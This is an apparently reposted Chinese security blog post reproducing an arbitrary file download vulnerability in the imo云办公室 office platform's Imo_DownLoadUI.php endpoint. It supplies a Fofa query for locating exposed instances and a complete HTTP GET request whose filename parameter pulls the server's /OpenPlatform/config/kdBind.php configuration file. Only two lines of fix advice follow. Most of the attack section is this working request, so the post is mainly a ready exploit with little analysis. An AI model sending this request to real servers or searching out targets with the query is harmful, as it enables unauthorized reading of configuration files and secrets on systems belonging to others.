当前位置: 首页 > news >正文

imo云办公室 Imo_DownLoadUI.php 任意文件下载漏洞复现

news 来源:原创 2024/9/22 15:11:54

0x01 漏洞描述:

    imo云办公室由上海易睦网络科技有限公司于2007年创立,总部位于上海,imo云办公室管理运营企业即时通讯平台imo,包括对imo的在线支持,故障处理,客户服务等,对imo进行持续研发,提供在线升级等。由于 /file/Placard/upload/Imo_DownLoadUI.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。

0x02 搜索语句:

Fofa:app="IMO-云办公室"

0x03 漏洞复现:

GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

0x04 修复建议: 

如非必要请关闭互联网访问端口或限制接口访问

接口参数假加上读取校验

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Amesim-帮助文件翻译与总结-重要元件之firstorderlag
  • 小琳AI课堂:确保大语言模型安全的八大策略--从数据隐私到用户教育
  • Effective Java 学习笔记 方法签名设计
  • 使用python用递归实现汉诺塔算法
  • 三种springboot启动时加载方式
  • 蓝桥杯【物联网】零基础到国奖之路:十. OLED
  • 花朵识别系统Python+卷积神经网络算法+人工智能+深度学习+计算机课设项目+TensorFlow+模型训练
  • 基于无人机影像的可见光单木分割数据集-json格式
  • [Python]二、Python基础数据科学库(1)
  • 2024最新!!!iOS高级面试题,全!(二)
  • Golang | Leetcode Golang题解之第416题分割等和子集
  • Linux系统(Ubuntu)(下载篇)
  • C++11标准模板(STL)- 常用数学函数 - 计算e的给定幂 (ex)(std::exp, std::expf, std::expl)
  • 【Oracle】ORA-02292: integrity constraint
  • Qt clicked()、clicked(bool)、toggled(bool)信号的区别和联系
  • php的引用
  • [笔记] php常见简单功能及函数
  • 8年软件测试工程师感悟——写给还在迷茫中的朋友
  • angular学习第一篇-----环境搭建
  • co.js - 让异步代码同步化
  • Javascript Math对象和Date对象常用方法详解
  • JavaScript/HTML5图表开发工具JavaScript Charts v3.19.6发布【附下载】
  • mongodb--安装和初步使用教程
  • Netty+SpringBoot+FastDFS+Html5实现聊天App(六)
  • PAT A1017 优先队列
  • Redis学习笔记 - pipline(流水线、管道)
  • vuex 笔记整理
  • 关于 Cirru Editor 存储格式
  • 关于Java中分层中遇到的一些问题
  • 将 Measurements 和 Units 应用到物理学
  • 七牛云 DV OV EV SSL 证书上线,限时折扣低至 6.75 折!
  • 驱动程序原理
  • 通过几道题目学习二叉搜索树
  • 微信小程序开发问题汇总
  • 智能合约开发环境搭建及Hello World合约
  • 浅谈sql中的in与not in,exists与not exists的区别
  • ​七周四次课(5月9日)iptables filter表案例、iptables nat表应用
  • #Datawhale AI夏令营第4期#多模态大模型复盘
  • #LLM入门|Prompt#2.3_对查询任务进行分类|意图分析_Classification
  • (2)nginx 安装、启停
  • (C语言)strcpy与strcpy详解,与模拟实现
  • (Matalb时序预测)PSO-BP粒子群算法优化BP神经网络的多维时序回归预测
  • (PADS学习)第二章:原理图绘制 第一部分
  • (react踩过的坑)antd 如何同时获取一个select 的value和 label值
  • (Windows环境)FFMPEG编译,包含编译x264以及x265
  • (zhuan) 一些RL的文献(及笔记)
  • (带教程)商业版SEO关键词按天计费系统:关键词排名优化、代理服务、手机自适应及搭建教程
  • (二)测试工具
  • (二刷)代码随想录第16天|104.二叉树的最大深度 559.n叉树的最大深度● 111.二叉树的最小深度● 222.完全二叉树的节点个数
  • (附源码)php新闻发布平台 毕业设计 141646
  • (经验分享)作为一名普通本科计算机专业学生,我大学四年到底走了多少弯路
  • (图文详解)小程序AppID申请以及在Hbuilderx中运行
  • (学习日记)2024.01.09
  • (转)JVM内存分配 -Xms128m -Xmx512m -XX:PermSize=128m -XX:MaxPermSize=512m
  • (转)Windows2003安全设置/维护